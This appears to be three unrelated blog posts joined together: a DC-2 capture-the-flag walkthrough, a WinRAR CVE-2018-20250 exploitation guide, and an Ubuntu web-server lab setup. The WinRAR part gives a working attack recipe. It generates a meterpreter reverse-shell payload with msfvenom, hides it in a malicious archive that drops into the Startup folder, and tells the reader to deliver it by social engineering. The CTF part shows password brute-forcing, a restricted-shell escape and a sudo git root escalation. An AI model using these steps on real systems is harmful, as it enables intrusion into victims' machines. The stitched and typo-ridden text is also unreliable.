DC-2 Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “DC-2”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.

Security Level: Beginner

Penetrating Methodology:

·         Discovering Targets IP

·         Network scanning (Nmap)   

·         Adding Domain name to Host file

·         Surfing HTTP service port

·         Using WPscan for Username enumeration

·         Using cewl for creating wordlist

·         Logging into Wordpress

·         Logging in through SSH

·         Escaping restricted shell

·         Finding binary in sudoers list

·         Getting root access and Reading final flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover

We found our Targets IP Address 192.168.1.101. Our next step is to scan our targets IP Address with nmap.
nmap -p- -A 192.168.1.101
OKAY!! With the following result of nmap scan I found here port 7744 is used for SSH and port 80 for HTTP service, moreover there all it shows all http services are made to redirect on http://dc-2.

Therefore, we thought of adding the Domain Name into our Host file, so that we will be able to access http services.
cat /etc/hosts

Since port 80 is open, we explored the Domain Name on the browser. We discovered the webpage got a WordPress CMS installed on it.

The Flag option on the webpage clearly got our attention. Let’s check what hint it has for us. So from this page, we got a really good hint to move ahead.

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

wpscan --url http://dc-2 --enumerate p --enumerate t --enumerate u

I found three user names: admin, jerry and Tom and as said above we need use cewl which is used for generating dictionary by spidering website.

Therefore, we have used cewl to build a wordlist for passwords from inside http://dc-2 as shown in the image.

cewl http://dc-2/  password      

cat password

So, we have dictionary for passwords which we have generated using cewl and saved wordpress usernames in a text file.

cat users

Time to fire up wpscan with our username & password list to valid user login combination.

wpscan --url http://dc-2 -U users -P password

We have successfully found the password for Tom & Jerry. Let’s make good use of them.

jerry: adipiscing

tom: parturient

Further, we login to wordpress using Jerry credentials. It was holding another clue for us in Flag 2.

Since the clue was telling us to find another entry point to reach to our final flag. Suddenly we thought making a SSH Login running on port 77454 by using Tom credentials.

We successfully got logged in but we have a restricted shell in which some commands are not found. But few commands are available.

ssh tom@192.168.1.101 -p 7744

ls

cat flag3.txt

echo $PATH

ls /home/tom/usr/bin

As you can observe that cat program is not present inside /bin and tom can run only five programs present inside /bin directory.

Since we had a restricted shell, we found that we can use the Vi editor. Therefore, we use Vi editor to escape the restricted shell.

After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and “/usr/bin” as our PATH environment variable so that we can run Linux commands properly.

export PATH=/bin:/usr/bin:$PATH

export SHELL=/bin/bash:$SHELL

After that we try to open flag3.txt afain using cat command and luckily found next hint to move ahead.

ls

cat flag3.txt

According to hint, now we need to switch user from tom to jerry but we don’t have jerry’s login credential. Then checked the sudoers list and found that tom can run “/usr/bin/git” as root without a password.

sudo -l

Having the root permission on git was like cherry on cake, because through this I can try to escalate low privilege shell to high privilege shell.
sudo git help add

Since the help console of git opens with editor where we can run below command. And for spawning root shell type !/bin/bash and hit enter.

Boom!!! We got the root access, then we switch to the root directory and found our final flag.

cd /root

ls

cat final-flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Code Execution from WinRAR

In this post WinRAR has patched a serious security faults last month, one of the world's most popular Windows file compression applications, which can only be exploited by tricking a WinRar user to extract maliceous archives. The vulnerability identified last year by research.checkpoint.com affects all versions released in all WinRAR over the past 19 years.

More About Evil Winarar

CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253

Pacted Version: WinRAR 5.70 Beta 1

This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR. The winrar uses the ACE format to compress the folder and unpack the compressed folder with the help of UNACE.DLL.

In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path. This happence due improper compilation when unace.dll come into face.

Let's download a python script that will generate a malicious file archive in a rar format. Once you download the python script, install the dependency required for it.

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git

cd Evil-WinRAR-Gen/

pip3 install -r requirements.txt

Further you need to give full permission to the python script inside the Evil-Winrar-Gen folder and then generate a malicious exe file with the help of msfvenom and name as “winrar.exe” as shown and multi handler inside metasploit.

chmod 777 evilWinRAR.py

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe

Now create a text file that will display to the victim when he extracts the rar file to confuse him. Then execute evilWinrar python script along with malicious exe file and text file, creating a malicious archive that you can send to the target.

touch winrar.txt

./evilWinRAR.py -e winrar.exe -g winrar.txt

python -m SimpleHTTPServer 8080

As said, this vulnerability allows us to extract the malicious file in the arbitrary path, with the help of this script we will allow rar files extraction in the /startup program. Now use social engineering for transferring the malicious rar to the victim and wait for victim to restart his machine to obtain reverse connection of the target.

There is currently no startup program in the target machine as shown below. Once the victim extracts the malicious rar file "evil.rar," our winrar.exe backdoor will extract from the startup program.

To ensure for winrar.exe file in startup folder, type shell:startup in the run prompt.

As soon as the victim will restart the machine, you will get reverse connection as shown.

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set-up our own web server for penetration testing on ubuntu 18. Ubuntu 18 has updated with the new features.

Table of content

Requirement

Web Server configuration

·         Apache2

·         php7.2

·         MySQL server

·         phpMyAdmin

·         Ftp protocol

·         Openssh server

·         Nmap

Requirement-ubuntu 18.0

Web Server Configuration

The Web server is a program that uses HTTP to serve users with files forming web pages in response to requests transmitted by their HTTP clients. The Web servers can also be called dedicated computers and apparatuses.

 Install Apache2

First, we will install Apache2. Apache is the most commonly used Web server on Linux Systems. Web servers are used to serve web pages requested by the client computers. So, let’s first install Apache in the ubuntu by the following command-

apt install apache2

 We have successfully installed apache2, by default apache runs on port 80.

                                                          

 Install PHP

Now we will install PHP 7modukle for apache 2 and for all of its dependencies. Earlier we used to install PHP 5 module for ubuntu 14. But now as it is not compatible in ubuntu 18.so we will install the latest version of php which is php7.2 For this run the following command in ubuntu terminal-

apt install php7.2

As you can see, we have done with php installation.

Install MySQL Server

Now comes the next step which is installation of MySQL server. MySQL is the famous open-source database which was very easier to install earlier. But now it requires some changes for ubuntu 18.

So, let’s go ahead step by step.

First, we will install MySQL sever by the following command-

apt get install mysql-server

So, we are done with the installation. In ubuntu 14, MySQL did not need a password as it required only the root user to logged in. But now it needs a password and it won’t allow root user to log in so we will provide a username and password of ubuntu in MySQL with the following command and as it will ask for the password; you have to use your ubuntu password here.After it gets logged in you will grant all the privileges to the user of ubuntu as in our case we have give all the privileges to user raj which will be identified with the password of ubuntu which is 123 in our case and after which we will reset all the previous privileges so that it can start the service with the new changes. For this the commands are the following.

mysql -u root -p

GRANT ALL PRIVILEGES ON *.*  TO ‘raj’@’%’ IDENTIFIED BY ‘123’ WITH GRANT OPTION;

flush privileges;

Great we are done with MySQL sever installation, by default it runs on port 3306, now restart mysql service.

service mysql restart

Install phpMyAdmin

 Now the next step is installation of phpMyAdmin software tool which is written in PHP and which is proposed to handle the administration of MYSQL over the WEB and it also supports a wide range of operations on MYSQL. First, we need to install phpMyAdmin by the following command-

apt install phpmyadmin

After the installation it will ask you to choose the web server. Here you need to choose apache2 which will automatically be configured to run phpmyadmin.

Next you will get a prompt which will be opened to configure database for phpmyadmin with dbconfig-common. Here you need to click on yes and the enter.

Again, you will get a prompt which will ask you to submit the password for phpMyAdmin, to register with the database server. Here we have given 123 as the password as it is essential to give it a password now.

 

The next step is configuration of phpmyadmin under apache, for this we need to edit apache2 conf file by adding two lines at the end of this file:

nano /etc/apache2/apache2.conf

#phpMyAdmin Configuration

 Include/etc/phpmyadmin/apache.conf

At the last as shown in the image below and then save it and after the editing save the file and restart apache2 service.

service apache2 restart

Now open phpmyadmin in the browser as localhost/phpmyadmin as shown in the image below-

Install ftp

 Now we will install FTP server in ubuntu which is used for the transfer of computer files between a client and server on a computer network. For this run the following command in the terminal-

  apt install vsftpd

As we can see in the above screenshot that ftp service has been installed in our system which runs on port 21

Install ssh

Now the next is SSh protocol which is method for secure remote login from one computer to another.so lets install this service by the following command. It is installed successfully; by default, it runs on port 22.

apt install openssh-server

Install Nmap

Now in order to check that the above services have been installed properly in our system; we will use nmap which is a scanner for ports and which tells us about the open ports and running services status.

So, let’s install that by the following command-

apt install nmap

Once the installation is done, we will scan our own system by the following command and it will scan our system and will come up with the desired results as you can see in the image given below-

nmap 127.0.0.1